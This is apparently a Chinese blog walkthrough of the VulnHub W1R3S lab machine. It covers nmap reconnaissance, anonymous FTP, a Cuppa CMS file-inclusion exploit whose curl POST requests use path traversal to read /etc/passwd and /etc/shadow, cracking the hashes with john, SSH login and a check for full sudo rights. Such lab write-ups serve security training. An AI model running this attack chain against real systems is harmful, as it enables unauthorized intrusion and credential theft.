# 靶机下载 vulnhub -> W1R3S 1.0.1 # nmap扫描收集信息 ## 主机发现 **-sn**参数,仅探活主机 `nmap -sn 192.168.1.0/24` 通过对比新增主机,可以确定192.168.1.14是靶机 ## 扫描开放端口 `nmap -sT --min-rate 10000 -p- 192.168.1.14 -oA ./port` **-sT**参数是通过完整的tcp连接过程来确定端口开放状态,结果更准确也更隐蔽。**--min-rate**参数指定扫描速率,取准确度跟速度的平衡值。**-p-**参数指定扫描所有端口。**-oA**参数将结果输出成三种格式的文件,方便后面查看。 ## 扫描详细信息 `nmap -sT -sC -sV -O 192.168.1.14 -p21,22,80,3306 -oA ./detail` ## 扫udp端口开放情况 `nmap -sU --top-ports 20 192.168.1.14` ## 脚本扫描 `nmap --script=vuln -p21,22,80,3306 192.168.1.14 -oA ./vuln` ## 确定任务优先级 21端口跑的是ftp服务而且可以匿名登录,可能有信息泄露。22端口跑的ssh,爆破进去的希望不大,优先级往后排。80端口跑的http,比较重要。3306端口跑的mysql,可以尝试去登录一下。优先级21,3306,80,22. ## ftp渗透 ftp 192.168.1.14 利用anonymous登录 利用get把文件都下载下来,注意进去ftp后先执行binary命令可以保证下载下来的文件不会损坏
这个泄露了员工姓名和对应职位,其他的文件都没看出什么信息
## 尝试登录mysql
不允许远程登录(这里我网络环境变了,靶机ip也变了)
## 渗透80端口
前面得到wordpress页面,拼接访问
无论点击哪个按钮都会跳转到localhost
扫目录,看看有没有新的突破口
`dirsearch -u http://192.168.128.58 --json-report=result`
得到很多路径,拼接访问。有个cuppa cms的安装页面
点击next往下安装,安装成功但是创建用户失败
查有没有历史漏洞
`searchsploit cuppa cms`
把exp复制到当前目录
`searchsploit -m 25971.txt`
里面列出访问路径,漏洞出现行,文件包含漏洞,exp示范。有本地任意文件包含,能实现任意文件读取
尝试拼接访问,404
往administrator目录后拼接,404
删掉/cuppa后往administrator拼接,访问成功但是没内容返回
到网上找cms源码看看
要post方式传参
`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/passwd"`
`curl -X POST http://192.168.128.58/administrator/alerts/alertConfigField.php -d "urlConfig=../../../../../../../../../etc/shadow"`
将有哈希的保存到一个文件,然后用john爆破,`john shadowtest --wordlist /usr/share/wordlists/rockyou.txt`。等待运行完毕使用`john --show shadow文件名`查看
## ssh连接
得到密码后通过ssh连接靶机,`ssh username@ip`
查看当前权限,可以看到用sudo命令权限
`id`
查看可以sudo执行的命令,3个ALL相当于root权限
`sudo -l`
标签:1.14,1.0,..,##,端口,192.168,--,W1R3S From: https://www.cnblogs.com/dg05/p/18516843